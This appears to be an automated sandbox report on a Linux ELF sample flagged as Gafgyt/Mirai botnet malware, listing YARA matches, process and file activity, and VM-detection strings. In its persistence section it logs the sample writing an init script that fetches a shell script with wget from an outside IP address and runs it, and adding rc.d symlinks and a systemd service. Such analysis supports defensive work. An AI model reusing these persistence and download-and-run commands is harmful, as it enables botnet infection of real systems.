          Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
          Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
          Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
          Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
          Source: 6316.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
          Source: 6316.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
          Source: 6316.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
          Source: 6316.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
          Source: 6316.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
          Source: 6316.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
          Source: 6316.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
          Source: 6255.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
          Source: 6255.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
          Source: 6255.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
          Source: 6255.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
          Source: 6255.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
          Source: 6255.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
          Source: 6255.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
          Source: 6326.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
          Source: 6326.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
          Source: 6326.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
          Source: 6326.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
          Source: 6326.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
          Source: 6326.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
          Source: 6326.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
          Source: 6318.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
          Source: 6318.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
          Source: 6318.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
          Source: 6318.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
          Source: 6318.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
          Source: 6318.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
          Source: 6318.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
          Source: 6327.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
          Source: 6327.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
          Source: 6327.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
          Source: 6327.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
          Source: 6327.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
          Source: 6327.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
          Source: 6327.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
          Source: classification engineClassification label: mal100.spre.troj.evad.linELF@0/9@0/0

          Persistence and Installation Behavior

          barindex
          Source: /tmp/x86_64.nn.elf (PID: 6255)File: /etc/profileJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6255)File: /etc/rc.localJump to behavior
          Source: /usr/bin/ln (PID: 6308)File: /etc/rcS.d/S99system -> /etc/init.d/systemJump to behavior
          Source: /usr/bin/ln (PID: 6315)File: /etc/rc.d/S99sh -> /etc/init.d/shJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6255)File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)Jump to behavior
          Source: /usr/bin/chmod (PID: 6306)File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)Jump to behavior
          Source: /usr/bin/chmod (PID: 6311)File: /etc/init.d/sh (bits: - usr: rx grp: rx all: rwx)Jump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6319)File opened: /proc/6373/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6319)File opened: /proc/6472/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6319)File opened: /proc/6372/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6319)File opened: /proc/6471/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6319)File opened: /proc/6430/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6319)File opened: /proc/6375/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6319)File opened: /proc/6474/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6319)File opened: /proc/6374/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6319)File opened: /proc/6473/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6319)File opened: /proc/6431/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6319)File opened: /proc/6475/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6319)File opened: /proc/6371/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6319)File opened: /proc/6470/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6319)File opened: /proc/6370/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6319)File opened: /proc/799/cmdlineJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6319)File opened: /proc/6425/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6319)File opened: /proc/6447/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6319)File opened: /proc/6469/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6319)File opened: /proc/6369/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6319)File opened: /proc/6446/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6319)File opened: /proc/6468/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6319)File opened: /proc/6405/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6319)File opened: /proc/6449/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6319)File opened: /proc/6448/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6319)File opened: /proc/6426/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6319)File opened: /proc/6429/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6319)File opened: /proc/6428/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6319)File opened: /proc/6461/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6319)File opened: /proc/6460/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6319)File opened: /proc/6089/cmdlineJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6319)File opened: /proc/6463/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6319)File opened: /proc/6462/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6319)File opened: /proc/6465/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6319)File opened: /proc/6464/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6319)File opened: /proc/6445/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6319)File opened: /proc/6467/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6319)File opened: /proc/6466/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6319)File opened: /proc/6459/statusJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6272)Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1"Jump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6304)Shell command executed: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"Jump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6307)Shell command executed: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"Jump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6309)Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"Jump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6310)Shell command executed: sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"Jump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6312)Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"Jump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6314)Shell command executed: sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"Jump to behavior
          Source: /bin/sh (PID: 6306)Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/systemJump to behavior
          Source: /bin/sh (PID: 6311)Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/shJump to behavior
          Source: /bin/sh (PID: 6313)Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.dJump to behavior
          Source: /bin/sh (PID: 6278)Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.serviceJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6255)File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)Jump to behavior
          Source: /usr/bin/chmod (PID: 6306)File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)Jump to behavior
          Source: /usr/bin/chmod (PID: 6311)File: /etc/init.d/sh (bits: - usr: rx grp: rx all: rwx)Jump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6255)Writes shell script file to disk with an unusual file extension: /etc/init.d/systemJump to dropped file
          Source: /tmp/x86_64.nn.elf (PID: 6255)Writes shell script file to disk with an unusual file extension: /etc/rc.localJump to dropped file
          Source: /bin/sh (PID: 6309)Writes shell script file to disk with an unusual file extension: /etc/init.d/shJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: /tmp/x86_64.nn.elf (PID: 6255)File: /etc/init.d/systemJump to dropped file
          Source: /bin/sh (PID: 6309)File: /etc/init.d/shJump to dropped file
          Source: /tmp/x86_64.nn.elf (PID: 6255)File: /tmp/x86_64.nn.elfJump to behavior
          Source: x86_64.nn.elf, 6327.1.0000000000efd000.0000000000eff000.rw-.sdmpBinary or memory string: /usr/bin/vmtoolsd
          Source: x86_64.nn.elf, 6327.1.0000000000efd000.0000000000eff000.rw-.sdmpBinary or memory string: /usr/bin/vmtoolsd
          Source: x86_64.nn.elf, 6255.1.00007fff0efc5000.00007fff0efe6000.rw-.sdmp, x86_64.nn.elf, 6316.1.00007fff0efc5000.00007fff0efe6000.rw-.sdmp, x86_64.nn.elf, 6318.1.00007fff0efc5000.00007fff0efe6000.rw-.sdmp, x86_64.nn.elf, 6326.1.00007fff0efc5000.00007fff0efe6000.rw-.sdmp, x86_64.nn.elf, 6327.1.00007fff0efc5000.00007fff0efe6000.rw-.sdmpBinary or memory string: qemu-

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: x86_64.nn.elf, type: SAMPLE
          Source: Yara matchFile source: 6316.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6255.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6326.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6318.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6327.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: x86_64.nn.elf, type: SAMPLE
          Source: Yara matchFile source: 6316.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6255.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6326.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6318.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6327.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: x86_64.nn.elf PID: 6255, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: x86_64.nn.elf PID: 6316, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: x86_64.nn.elf PID: 6318, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: x86_64.nn.elf PID: 6326, type: MEMORYSTR
